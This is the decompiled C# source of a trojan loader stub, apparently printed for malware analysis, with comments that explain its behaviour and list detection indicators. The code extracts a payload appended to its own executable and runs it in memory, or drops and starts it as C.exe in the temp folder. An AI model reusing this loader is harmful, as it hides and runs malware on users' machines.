// Decompiled with JetBrains decompiler
// Type: LilPoney.Program
// Assembly: LilPoney, Version=1.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: 1C63AA57-9559-4CD2-A85A-70799118F319
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\Trojan.Win32.Inject.aagsb-7963deb448437c7505789ca0bcb4b13edfc5b040b6004eeb17e9d495e54067ff.exe
using System;
using System.Collections.Generic;
using System.Diagnostics;
using System.IO;
using System.Reflection;
namespace LilPoney
{
  // Analyst summary (from the decompiled code below): this type is a loader stub.
  // It reads its own executable file, keeps only the bytes that follow the second
  // occurrence of SPLIT_KEY, deletes every occurrence of CRYPT_KEY from that data,
  // and then tries to run the result as a managed assembly loaded from memory.
  // If that attempt reports failure, the same bytes are written to "C.exe" in the
  // temp directory and started as a new process.
  // Observable behaviour for detection: a process opening its own image for
  // reading, Assembly.Load on a byte array, and creation plus execution of
  // "C.exe" under the path returned by Path.GetTempPath().
  internal class Program
  {
    // 8-byte marker (hex 05 06 15 16 40 45 85 65) that getAllBytesWithoutCrypt
    // strips from the payload. No cipher is applied anywhere in this class; the
    // "crypt" step visible here is only removal of this byte sequence.
    private static byte[] CRYPT_KEY = new byte[8]
    {
      (byte) 5,
      (byte) 6,
      (byte) 21,
      (byte) 22,
      (byte) 64,
      (byte) 69,
      (byte) 133,
      (byte) 101
    };
    // 8-byte delimiter (hex 05 45 87 18 26 14 08 77) that getAllBytesWithoutStub
    // searches for in the stub's own file; the payload is whatever follows its
    // second occurrence.
    // NOTE(review): the first occurrence is presumably the copy of this array
    // stored in the stub's own image - confirm against the sample.
    private static byte[] SPLIT_KEY = new byte[8]
    {
      (byte) 5,
      (byte) 69,
      (byte) 135,
      (byte) 24,
      (byte) 38,
      (byte) 20,
      (byte) 8,
      (byte) 119
    };

    // Entry point: extracts the appended payload from the running executable and
    // executes it, first in memory and, if that reports failure, from disk.
    // args is not used.
    private static void Main(string[] args)
    {
      // Never read afterwards in the code shown.
      byte[] numArray = new byte[0];
      // Opens the file backing the current process, i.e. the stub reads itself.
      // The reader is never closed or disposed in this method.
      StreamReader streamReader = new StreamReader(Process.GetCurrentProcess().MainModule.FileName);
      // Whole file -> bytes after the second SPLIT_KEY -> CRYPT_KEY sequences removed.
      byte[] bytesWithoutCrypt = Program.getAllBytesWithoutCrypt(Program.getAllBytesWithoutStub(new BinaryReader(streamReader.BaseStream).ReadBytes(Convert.ToInt32(streamReader.BaseStream.Length))));
      // In-memory execution path; nothing is written to disk when it returns true.
      if (Program.onRunExeByteArray(bytesWithoutCrypt))
        return;
      // Fallback path: the recovered payload is written byte by byte to a fixed
      // file name in the temp directory and started as a separate process.
      StreamWriter streamWriter = new StreamWriter(Path.GetTempPath() + "C.exe");
      foreach (byte num in bytesWithoutCrypt)
        streamWriter.BaseStream.WriteByte(num);
      streamWriter.Close();
      Process.Start(Path.GetTempPath() + "C.exe");
    }

    // Returns the bytes of allBytes that follow the second complete occurrence of
    // SPLIT_KEY; returns an empty array when fewer than two occurrences exist.
    private static byte[] getAllBytesWithoutStub(byte[] allBytes)
    {
      List<byte> byteList = new List<byte>();
      // Number of complete SPLIT_KEY matches seen so far (matching stops at 2).
      int num = 0;
      // Becomes true on the iteration that ends the second match, so that the
      // last delimiter byte itself is not copied.
      bool flag = false;
      for (int index1 = 0; index1 < allBytes.Length; ++index1)
      {
        if ((int) allBytes[index1] == (int) Program.SPLIT_KEY[0] && num < 2)
        {
          // NOTE(review): allBytes[index1 + index2] is not bounds-checked; a partial
          // match running up to the end of the array would index past it.
          for (int index2 = 0; index2 < Program.SPLIT_KEY.Length && (int) allBytes[index1 + index2] == (int) Program.SPLIT_KEY[index2]; ++index2)
          {
            if (index2 == Program.SPLIT_KEY.Length - 1)
            {
              ++num;
              // Leaves index1 on the last byte of the delimiter.
              index1 += index2;
            }
          }
        }
        if (num == 2)
        {
          if (!flag)
            flag = true;
          else
            byteList.Add(allBytes[index1]);
        }
      }
      return byteList.ToArray();
    }

    // Returns a copy of allBytes with every complete occurrence of the 8-byte
    // CRYPT_KEY sequence removed; all other bytes are kept in order.
    private static byte[] getAllBytesWithoutCrypt(byte[] allBytes)
    {
      List<byte> byteList = new List<byte>();
      // True only for the iteration on which a full CRYPT_KEY match was found.
      bool flag = false;
      for (int index1 = 0; index1 < allBytes.Length; ++index1)
      {
        if ((int) allBytes[index1] == (int) Program.CRYPT_KEY[0])
        {
          // NOTE(review): same unchecked allBytes[index1 + index2] access as in
          // getAllBytesWithoutStub.
          for (int index2 = 0; index2 < Program.CRYPT_KEY.Length && (int) allBytes[index1 + index2] == (int) Program.CRYPT_KEY[index2]; ++index2)
          {
            if (index2 == Program.CRYPT_KEY.Length - 1)
            {
              flag = true;
              // Skips the first seven marker bytes; the eighth is dropped by the flag test below.
              index1 += index2;
            }
          }
        }
        if (!flag)
          byteList.Add(allBytes[index1]);
        flag = false;
      }
      return byteList.ToArray();
    }

    // Loads allBytes as a managed assembly from memory and invokes its entry
    // point. Returns false if any exception is thrown, true otherwise (including
    // when the assembly has no entry point).
    private static bool onRunExeByteArray(byte[] allBytes)
    {
      try
      {
        // Assembly is loaded from the byte array, not from a file path.
        Assembly assembly = Assembly.Load(allBytes);
        MethodInfo entryPoint = assembly.EntryPoint;
        if ((object) entryPoint != null)
        {
          // Passes the entry-point method name where CreateInstance expects a type name.
          // NOTE(review): this presumably yields null for most payloads - confirm.
          object instance = assembly.CreateInstance(entryPoint.Name);
          // Invoked with a null parameter array.
          // NOTE(review): an entry point declaring a string[] parameter would
          // presumably make Invoke throw, sending Main to the on-disk fallback -
          // confirm by dynamic analysis.
          entryPoint.Invoke(instance, (object[]) null);
        }
      }
      // Every exception, including one raised by the invoked payload, is swallowed
      // and reported as failure, which makes Main drop and start C.exe.
      catch (Exception ex)
      {
        return false;
      }
      return true;
    }
  }
}